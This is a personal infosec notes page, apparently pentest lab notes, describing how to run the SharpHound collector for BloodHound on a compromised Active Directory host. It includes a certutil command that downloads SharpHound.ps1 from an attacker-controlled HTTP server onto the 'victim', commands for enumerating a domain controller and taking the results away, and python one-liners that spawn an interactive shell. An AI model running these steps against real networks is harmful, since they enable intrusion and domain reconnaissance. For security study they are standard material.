akde/infosec

Information security is ultimately about managing risk

BloodHound

, , ,

Blood­Hound ana­lyzes and present Active Direc­to­ry Data. SharpHound is the data col­lec­tor which runs on a com­pro­mised AD system.

On the target:

  1. Upload the lat­est SharpHound.ps1 release to the target.
  2. Exe­cute it
    Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp
  3. Down­load the findings

On the own system:

  1. Start Blood­hound
    # neo4j start
    # bloodhound
  2. Upload the file SharpHound.ps1 (in the Ingestors direc­to­ry) to the vic­tim 
    certutil.exe -urlcache -split -f "http://192.168.119.158:8000/SharpHound.ps1" SharpHound.ps1
  3. Exe­cute it on the vic­tim with­in Pow­er­Shell: 
    Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain svcorp.com -DomainController 10.11.1.20
  4. Down­load the cre­at­ed  ZIP file
  5. Import the files local­ly and analyse them.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';